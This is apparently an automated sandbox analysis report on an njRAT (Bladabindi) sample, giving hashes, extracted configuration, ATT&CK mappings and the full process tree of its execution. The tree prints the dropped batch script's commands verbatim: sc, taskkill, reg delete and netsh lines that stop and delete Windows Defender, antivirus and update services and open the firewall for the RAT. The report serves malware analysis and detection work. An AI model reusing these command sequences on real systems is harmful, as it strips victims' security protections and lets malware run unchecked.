njrat | e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c

Analysis

max time kernel
150s
max time network
149s
platform
windows7_x64
resource
win7v20210408
submitted
29-09-2021 07:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe
Size

341KB
MD5

e8fb8e14c5e50dd51a7499b84e2c857a
SHA1

bad853c5496bc28f492c01cdc6fff77efd72dc74
SHA256

e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c
SHA512

2b15a3c3cb4b04f978043d45ac32ed2ab7dfef11ec0b6010a73a2d39b8aa112b18846cb60383c63108fd7bcd4c7f9abae26b354320902a59f923d436d73f4131

Score

10^/10

njrat cvcvc evasion trojan

Malware Config

Extracted

Family

njrat

Version

0.7d

Botnet

cvcvc

127.0.0.1:6544

Mutex

f08ba698cf12b161ed2e70452386d723

Attributes

reg_key
f08ba698cf12b161ed2e70452386d723
splitter
Y262SUCZ4UJJ

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Security	reg.exe

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Nirsoft 11 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe	Nirsoft

Executes dropped EXE 5 IoCs

Processes:

AdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.execd.exe

pid process

268 AdvancedRun.exe
948 AdvancedRun.exe
1788 AdvancedRun.exe
1772 AdvancedRun.exe
2024 cd.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Loads dropped DLL 9 IoCs

Processes:

e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exeAdvancedRun.exeAdvancedRun.exe

pid	process
1988	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe
1988	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe
268	AdvancedRun.exe
1988	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe
1988	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe
1788	AdvancedRun.exe
1988	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe
1988	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe
1988	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe

Drops file in Program Files directory 21 IoCs

Processes:

cmd.exe

description	ioc	process
File opened for modification	C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpAsDesc.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpCmdRun.exe	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpCommu.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MpClient.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MSASCui.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MsMpLics.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpRTP.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpEvMsg.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpOAV.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpSvc.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpLics.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MpAsDesc.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MpOAV.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpClient.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpCom.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpRes.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui	cmd.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

1648 taskkill.exe
1132 taskkill.exe
760 taskkill.exe
1076 taskkill.exe
1296 taskkill.exe

pid	process
1648	taskkill.exe
1132	taskkill.exe
760	taskkill.exe
1076	taskkill.exe
1296	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

AdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.execd.exe

pid	process
268	AdvancedRun.exe
268	AdvancedRun.exe
948	AdvancedRun.exe
948	AdvancedRun.exe
1788	AdvancedRun.exe
1788	AdvancedRun.exe
1772	AdvancedRun.exe
1772	AdvancedRun.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe
2024	cd.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

Processes:

AdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execd.exe

description	pid	process
Token: SeDebugPrivilege	268	AdvancedRun.exe
Token: SeImpersonatePrivilege	268	AdvancedRun.exe
Token: SeDebugPrivilege	948	AdvancedRun.exe
Token: SeImpersonatePrivilege	948	AdvancedRun.exe
Token: SeDebugPrivilege	1788	AdvancedRun.exe
Token: SeImpersonatePrivilege	1788	AdvancedRun.exe
Token: SeDebugPrivilege	1772	AdvancedRun.exe
Token: SeImpersonatePrivilege	1772	AdvancedRun.exe
Token: SeDebugPrivilege	1648	taskkill.exe
Token: SeDebugPrivilege	1132	taskkill.exe
Token: SeDebugPrivilege	760	taskkill.exe
Token: SeDebugPrivilege	1076	taskkill.exe
Token: SeDebugPrivilege	1296	taskkill.exe
Token: SeDebugPrivilege	2024	cd.exe
Token: 33	2024	cd.exe
Token: SeIncBasePriorityPrivilege	2024	cd.exe
Token: 33	2024	cd.exe
Token: SeIncBasePriorityPrivilege	2024	cd.exe
Token: 33	2024	cd.exe
Token: SeIncBasePriorityPrivilege	2024	cd.exe
Token: 33	2024	cd.exe
Token: SeIncBasePriorityPrivilege	2024	cd.exe
Token: 33	2024	cd.exe
Token: SeIncBasePriorityPrivilege	2024	cd.exe
Token: 33	2024	cd.exe
Token: SeIncBasePriorityPrivilege	2024	cd.exe
Token: 33	2024	cd.exe
Token: SeIncBasePriorityPrivilege	2024	cd.exe
Token: 33	2024	cd.exe
Token: SeIncBasePriorityPrivilege	2024	cd.exe
Token: 33	2024	cd.exe
Token: SeIncBasePriorityPrivilege	2024	cd.exe
Token: 33	2024	cd.exe
Token: SeIncBasePriorityPrivilege	2024	cd.exe
Token: 33	2024	cd.exe
Token: SeIncBasePriorityPrivilege	2024	cd.exe
Token: 33	2024	cd.exe
Token: SeIncBasePriorityPrivilege	2024	cd.exe
Token: 33	2024	cd.exe
Token: SeIncBasePriorityPrivilege	2024	cd.exe
Token: 33	2024	cd.exe
Token: SeIncBasePriorityPrivilege	2024	cd.exe
Token: 33	2024	cd.exe
Token: SeIncBasePriorityPrivilege	2024	cd.exe
Token: 33	2024	cd.exe
Token: SeIncBasePriorityPrivilege	2024	cd.exe
Token: 33	2024	cd.exe
Token: SeIncBasePriorityPrivilege	2024	cd.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exeAdvancedRun.exeAdvancedRun.execmd.exe

description	pid	process	target process
PID 1988 wrote to memory of 268	1988	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe	AdvancedRun.exe
PID 1988 wrote to memory of 268	1988	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe	AdvancedRun.exe
PID 1988 wrote to memory of 268	1988	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe	AdvancedRun.exe
PID 1988 wrote to memory of 268	1988	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe	AdvancedRun.exe
PID 268 wrote to memory of 948	268	AdvancedRun.exe	AdvancedRun.exe
PID 268 wrote to memory of 948	268	AdvancedRun.exe	AdvancedRun.exe
PID 268 wrote to memory of 948	268	AdvancedRun.exe	AdvancedRun.exe
PID 1988 wrote to memory of 1788	1988	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe	AdvancedRun.exe
PID 1988 wrote to memory of 1788	1988	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe	AdvancedRun.exe
PID 1988 wrote to memory of 1788	1988	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe	AdvancedRun.exe
PID 1988 wrote to memory of 1788	1988	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe	AdvancedRun.exe
PID 1788 wrote to memory of 1772	1788	AdvancedRun.exe	AdvancedRun.exe
PID 1788 wrote to memory of 1772	1788	AdvancedRun.exe	AdvancedRun.exe
PID 1788 wrote to memory of 1772	1788	AdvancedRun.exe	AdvancedRun.exe
PID 1988 wrote to memory of 1616	1988	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe	cmd.exe
PID 1988 wrote to memory of 1616	1988	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe	cmd.exe
PID 1988 wrote to memory of 1616	1988	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe	cmd.exe
PID 1988 wrote to memory of 1616	1988	e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe	cmd.exe
PID 1616 wrote to memory of 1664	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1664	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1664	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1664	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1520	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1520	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1520	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1520	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 296	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 296	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 296	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 296	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1000	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1000	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1000	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1000	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1732	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1732	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1732	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1732	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 612	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 612	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 612	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 612	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 744	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 744	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 744	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 744	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1848	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1848	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1848	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1848	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1744	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1744	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1744	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1744	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1584	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1584	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1584	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1584	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1644	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1644	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1644	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1644	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1840	1616	cmd.exe	sc.exe
PID 1616 wrote to memory of 1840	1616	cmd.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe
"C:\Users\Admin\AppData\Local\Temp\e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1988

C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe" /EXEFilename test.bat /RunAs 8 /Run
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:268

C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe" /SpecialRun 140020920 268
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:948

C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe" /EXEFilename test.bat /RunAs 8 /Run
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1788

C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe" /SpecialRun 140020920 1788
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\test.bat" "
2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1616

C:\Windows\SysWOW64\sc.exe
sc stop windefend
3⤵
PID:1664

C:\Windows\SysWOW64\sc.exe
sc config windefend start= disabled
3⤵
PID:1520

C:\Windows\SysWOW64\sc.exe
sc delete windefend
3⤵
PID:296

C:\Windows\SysWOW64\sc.exe
sc stop WdNisSvc
3⤵
PID:1000

C:\Windows\SysWOW64\sc.exe
sc config WdNisSvc start= disabled
3⤵
PID:1732

C:\Windows\SysWOW64\sc.exe
sc delete WdNisSvc
3⤵
PID:612

C:\Windows\SysWOW64\sc.exe
sc stop Sense
3⤵
PID:744

C:\Windows\SysWOW64\sc.exe
sc config Sense start= disabled
3⤵
PID:1848

C:\Windows\SysWOW64\sc.exe
sc delete Sense
3⤵
PID:1744

C:\Windows\SysWOW64\sc.exe
sc stop wuauserv
3⤵
PID:1584

C:\Windows\SysWOW64\sc.exe
sc config wuauserv start= disabled
3⤵
PID:1644

C:\Windows\SysWOW64\sc.exe
sc stop usosvc
3⤵
PID:1840

C:\Windows\SysWOW64\sc.exe
sc config usosvc start= disabled
3⤵
PID:1288

C:\Windows\SysWOW64\sc.exe
sc stop WaasMedicSvc
3⤵
PID:1412

C:\Windows\SysWOW64\sc.exe
sc config WaasMedicSvc start= disabled
3⤵
PID:1312

C:\Windows\SysWOW64\sc.exe
sc stop SecurityHealthService
3⤵
PID:1240

C:\Windows\SysWOW64\sc.exe
sc config SecurityHealthService start= disabled
3⤵
PID:1448

C:\Windows\SysWOW64\sc.exe
sc delete SecurityHealthService
3⤵
PID:760

C:\Windows\SysWOW64\sc.exe
sc stop SDRSVC
3⤵
PID:856

C:\Windows\SysWOW64\sc.exe
sc config SDRSVC start= disabled
3⤵
PID:1100

C:\Windows\SysWOW64\sc.exe
sc stop wscsvc
3⤵
PID:560

C:\Windows\SysWOW64\sc.exe
sc config wscsvc start= disabled
3⤵
PID:304

C:\Windows\SysWOW64\sc.exe
sc stop WdiServiceHost
3⤵
PID:1540

C:\Windows\SysWOW64\sc.exe
sc config WdiServiceHost start= disabled
3⤵
PID:1704

C:\Windows\SysWOW64\sc.exe
sc stop WdiSystemHost
3⤵
PID:1864

C:\Windows\SysWOW64\sc.exe
sc config WdiSystemHost start= disabled
3⤵
PID:1784

C:\Windows\SysWOW64\sc.exe
sc stop InstallService
3⤵
PID:1716

C:\Windows\SysWOW64\sc.exe
sc config InstallService Start= disabled
3⤵
PID:1672

C:\Windows\SysWOW64\sc.exe
sc stop VaultSvc
3⤵
PID:1572

C:\Windows\SysWOW64\sc.exe
sc config VaultSvc start= disabled
3⤵
PID:792

C:\Windows\SysWOW64\sc.exe
sc stop Spooler
3⤵
PID:1748

C:\Windows\SysWOW64\sc.exe
sc config Spooler start= disabled
3⤵
PID:544

C:\Windows\SysWOW64\sc.exe
sc stop LicenseManager
3⤵
PID:1812

C:\Windows\SysWOW64\sc.exe
sc config LicenseManager start= disabled
3⤵
PID:1296

C:\Windows\SysWOW64\sc.exe
sc stop DiagTrack
3⤵
PID:984

C:\Windows\SysWOW64\sc.exe
sc config DiagTrack start= disabled
3⤵
PID:1028

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im smartscreen.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1648

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SecurityHealthService.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1132

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SystemSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:760

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
3⤵
PID:1492

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center" /f
3⤵
PID:1628

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /f
3⤵
PID:460

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f
3⤵
PID:304

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /f
3⤵
PID:1540

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Security Health" /f
3⤵
PID:1760

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows Defender" /f
3⤵
PID:1876

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Defender" /f
3⤵
PID:1864

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot" /f
3⤵
PID:1708

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter" /f
3⤵
PID:1772

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisDrv" /f
3⤵
PID:1620

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /f
3⤵
PID:1672

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /f
3⤵
- Modifies security service
PID:1572

C:\Windows\SysWOW64\sc.exe
sc delete windefend
3⤵
PID:788

C:\Windows\SysWOW64\sc.exe
sc delete sense
3⤵
PID:1000

C:\Windows\SysWOW64\sc.exe
sc stop MBAMService
3⤵
PID:1248

C:\Windows\SysWOW64\sc.exe
sc config MBAMService start= disabled
3⤵
PID:1052

C:\Windows\SysWOW64\sc.exe
sc delete MBAMService
3⤵
PID:1244

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im MBAM.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1076

C:\Windows\SysWOW64\sc.exe
sc stop Bytefenceservice
3⤵
PID:1232

C:\Windows\SysWOW64\sc.exe
sc config Bytefenceservice start= disabled
3⤵
PID:616

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Bytefence.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1296

C:\Windows\SysWOW64\sc.exe
sc delete Bytefenceservice
3⤵
PID:1516

C:\Windows\SysWOW64\sc.exe
sc stop "avast! Tools"
3⤵
PID:1040

C:\Windows\SysWOW64\sc.exe
sc config "avast! Tools" start= disabled
3⤵
PID:1264

C:\Windows\SysWOW64\sc.exe
sc delete "avast! Tools"
3⤵
PID:1204

C:\Windows\SysWOW64\sc.exe
sc stop "avast! Antivirus"
3⤵
PID:1648

C:\Windows\SysWOW64\sc.exe
sc config "avast! Antivirus" start= disabled
3⤵
PID:1448

C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2024

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exe" "cd.exe" ENABLE
3⤵
PID:560

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
1⤵
PID:1888

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
MD5
9125a507060e4b3a3e287452cb71e7a1

SHA1
fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8

SHA256
29c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64

SHA512
5282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
MD5
9125a507060e4b3a3e287452cb71e7a1

SHA1
fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8

SHA256
29c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64

SHA512
5282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
MD5
9125a507060e4b3a3e287452cb71e7a1

SHA1
fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8

SHA256
29c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64

SHA512
5282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
MD5
9125a507060e4b3a3e287452cb71e7a1

SHA1
fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8

SHA256
29c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64

SHA512
5282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
MD5
9125a507060e4b3a3e287452cb71e7a1

SHA1
fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8

SHA256
29c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64

SHA512
5282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exe
MD5
41d608740bb964b50c7b79d28838a1c1

SHA1
b604f184bcfb2fb1c533d02e43e572a90c2df080

SHA256
826a457a8a39e24ac925b31bcdb24fdb97bd468ff913a30ea2ce66d7bb52181d

SHA512
1e403c1003e7e5e2f33120f6dcdf8c51cdc0203b1a7d3fc5db2eda0b8f5366928d028b4da1d23dd80a056293aff877820649df12abbbb50a6ca601ad8015f3af

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exe
MD5
41d608740bb964b50c7b79d28838a1c1

SHA1
b604f184bcfb2fb1c533d02e43e572a90c2df080

SHA256
826a457a8a39e24ac925b31bcdb24fdb97bd468ff913a30ea2ce66d7bb52181d

SHA512
1e403c1003e7e5e2f33120f6dcdf8c51cdc0203b1a7d3fc5db2eda0b8f5366928d028b4da1d23dd80a056293aff877820649df12abbbb50a6ca601ad8015f3af

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\test.bat
MD5
fedd9cb5e3ffd5436e973e7a627f3d3c

SHA1
d6b5eb6d7663b927afc92d5c890296e911bd9336

SHA256
ccd0633359705388d3597b9af4589498faca61acad2ec0be2711cd73cf47c774

SHA512
604e97d7fe1e5a7b72ad701625838546c7681352db507d6b0ff5f3dd4bef41d705f044f074391d12e3f316b88669df7163bfd37ec6dd0184a956f25ebd737911

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
MD5
9125a507060e4b3a3e287452cb71e7a1

SHA1
fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8

SHA256
29c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64

SHA512
5282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639

Download Submit
